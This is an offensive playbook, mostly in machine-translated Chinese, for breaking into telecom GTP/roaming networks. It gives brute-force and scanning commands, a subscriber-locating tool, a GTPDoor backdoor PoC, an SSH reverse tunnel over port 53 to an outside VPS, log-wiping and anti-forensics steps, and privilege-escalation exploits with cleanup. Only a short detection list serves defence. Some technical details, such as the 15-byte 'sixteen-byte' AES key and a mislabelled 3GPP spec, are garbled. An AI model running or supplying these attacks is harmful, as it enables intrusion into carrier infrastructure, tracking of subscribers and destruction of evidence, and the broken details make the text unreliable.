Telecom Network Exploitation (GTP / Roaming Environments)

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

一个令人惊讶的大量供应商网络元素出厂时带有硬编码的SSH/Telnet用户，例如root:admin、dbadmin:dbadmin、cacti:cacti、ftpuser:ftpuser，……一个专用的字典显著提高了暴力破解的成功率：

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

如果设备仅暴露管理 VRF，请首先通过跳跃主机进行转发（请参见下面的“SGSN Emu Tunnel”部分）。

1.2 GRX/IPX 内部的主机发现

大多数 GRX 运营商仍然允许 ICMP echo 在骨干网中传输。将 masscan 与内置的 gtpv1 UDP 探测器结合使用，以快速映射 GTP-C 监听器：

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. 枚举订阅者 – cordscan

以下 Go 工具构造 GTP-C 创建 PDP 上下文请求 数据包并记录响应。每个回复揭示了当前为查询的 IMSI 提供服务的 SGSN / MME，有时还会显示订阅者访问的 PLMN。

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

关键标志：

• --imsi 目标用户的IMSI
• --oper 家乡 / HNI (MCC+MNC)
• -w 将原始数据包写入pcap

可以修补二进制文件中的重要常量以扩大扫描范围：

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. 通过 GTP 执行代码 – GTPDoor

GTPDoor 是一个小型 ELF 服务，绑定 UDP 2123 并解析每个传入的 GTP-C 数据包。当有效负载以预共享标签开头时，其余部分会被解密（AES-128-CBC）并通过 /bin/sh -c 执行。标准输出/标准错误会在 Echo Response 消息中被外泄，以便不创建任何外部会话。

最小 PoC 数据包（Python）：

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

检测：

• 任何向 SGSN IP 发送 不平衡的回声请求 的主机
• GTP 版本标志设置为 1，而消息类型 = 1（回声） – 偏离规范

4. 通过核心进行枢转

4.1 sgsnemu + SOCKS5

OsmoGGSN 提供一个 SGSN 模拟器，能够 建立与真实 GGSN/PGW 的 PDP 上下文。 一旦协商完成，Linux 将接收到一个新的 tun0 接口，可以从漫游对等体访问。

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

通过适当的防火墙发夹，这个隧道绕过仅信号的VLAN，直接进入数据平面。

4.2 通过53端口的SSH反向隧道

DNS在漫游基础设施中几乎总是开放的。将内部SSH服务暴露给您的VPS，监听:53，然后从家中返回：

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

检查 VPS 上是否启用了 GatewayPorts yes。

5. 隐蔽通道

所有植入物都实现了看门狗，timestomp 它们的二进制文件，并在崩溃时重新生成。

6. 防御规避备忘单

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. 在遗留 NE 上的权限提升

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

清理提示：

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. 工具箱

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – 在前面的章节中描述的自定义工具。
• FScan : 内部网络 TCP 扫描 (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS 恶意 WPAD
• Microsocks + ProxyChains : 轻量级 SOCKS5 代理
• FRP (≥0.37) : NAT 穿透 / 资产桥接

检测思路

1. 任何设备除了 SGSN/GGSN 建立 Create PDP Context Requests。
2. 接收来自内部 IP 的非标准端口 (53, 80, 443) 的 SSH 握手。
3. 频繁的 Echo 请求没有相应的 Echo 响应 – 可能表明 GTPDoor 信标。
4. 高频率的 ICMP 回显应答流量，带有大的非零标识符/序列字段。

参考文献

• Palo Alto Unit42 – 全球电信网络的渗透
• 3GPP TS 29.060 – GPRS 隧道协议 (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)